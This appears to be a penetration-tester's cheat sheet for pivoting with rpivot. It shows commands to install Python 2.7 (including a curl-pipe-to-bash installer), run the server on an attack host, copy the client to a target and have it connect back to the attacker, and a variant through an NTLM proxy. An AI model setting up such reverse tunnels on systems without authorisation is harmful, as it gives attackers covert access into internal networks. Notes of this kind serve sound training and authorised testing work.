Prerequisites
-
Python 2.7 environment
sudo apt-get install python2.7
Alternative install for Python2.7
curl https://pyenv.run | bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(pyenv init -)"' >> ~/.bashrc
source ~/.bashrc
pyenv install 2.7
shell 2.7
-
Rpivot repo cloned on attack machine and/or target
git clone https://github.com/klsecservices/rpivot.git
Server (Attack Host)
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
- Listens on
0.0.0.0:9999(server port). - Exposes a SOCKS proxy on
9050.
Transfer Rpivot to Target
scp -r rpivot ubuntu@<IPaddressOfTarget>
Client (Target Host)
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
- Connects back to the Rpivot server.
Rpivot with NTLM HTTP Proxy (Other Example)
python client.py --server-ip TargetIP --server-port 8080 --ntlm-proxy-ip ProxyIP --ntlm-proxy-port 8081 --domain nameofWindowsDomain --username username --password password
- Example when dealing with an HTTP proxy that uses NTLM authentication in front of the Rpivot server.